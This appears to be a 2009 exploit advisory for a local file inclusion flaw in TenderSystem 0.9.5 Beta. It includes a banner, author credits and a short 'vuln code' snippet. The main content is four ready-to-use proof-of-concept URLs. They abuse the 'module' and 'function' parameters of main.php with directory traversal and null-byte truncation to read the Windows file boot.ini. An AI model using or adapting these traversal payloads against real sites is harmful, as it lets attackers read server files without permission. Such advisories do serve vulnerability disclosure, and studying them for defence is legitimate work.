Tender System 0.9.5b LFI :
__________ __ __ .___ __ .__
\______ \_____ ____ | | __ _____/ |_ __| _/____ _____ _/ |_| |__
| ___/\__ _/ ___| |/ // __ __/ __ |/ __ \__ \ __ |
| | / __ \ \___| < ___/| | / /_/ ___/ / __ | | | Y
|____| (____ /\___ >__|_ \___ >__| \____ |\___ >____ /__| |___| /
/ / / / / / / /
-------------------------------------------------------------------------------------------
Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS
I was unable to get this to work on a Linux server. Further testing may be required.
------------------------------------------------------------------------------------------
Target: TenderSystem
Version: 0.9.5 Beta
Site http://www.tendersystem.com/
Demo: http://demo.tendersystem.com/
Date: 2-14-2009
-------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.ssteam.ws
Contact: yaii_abc@hotmail.com
-------------------------------------------------------------------------------------------
Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws
-------------------------------------------------------------------------------------------
Exploit:
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login
http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html
http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg
-------------------------------------------------------------------------------------------------------
Vuln code in main.php:
// load required files
require('modules/generic/ts_main.php');
?>
-------------------------------------------------------------------------------------------------------
Some things are better left unsaid <3
... That is all.
/Packetdeath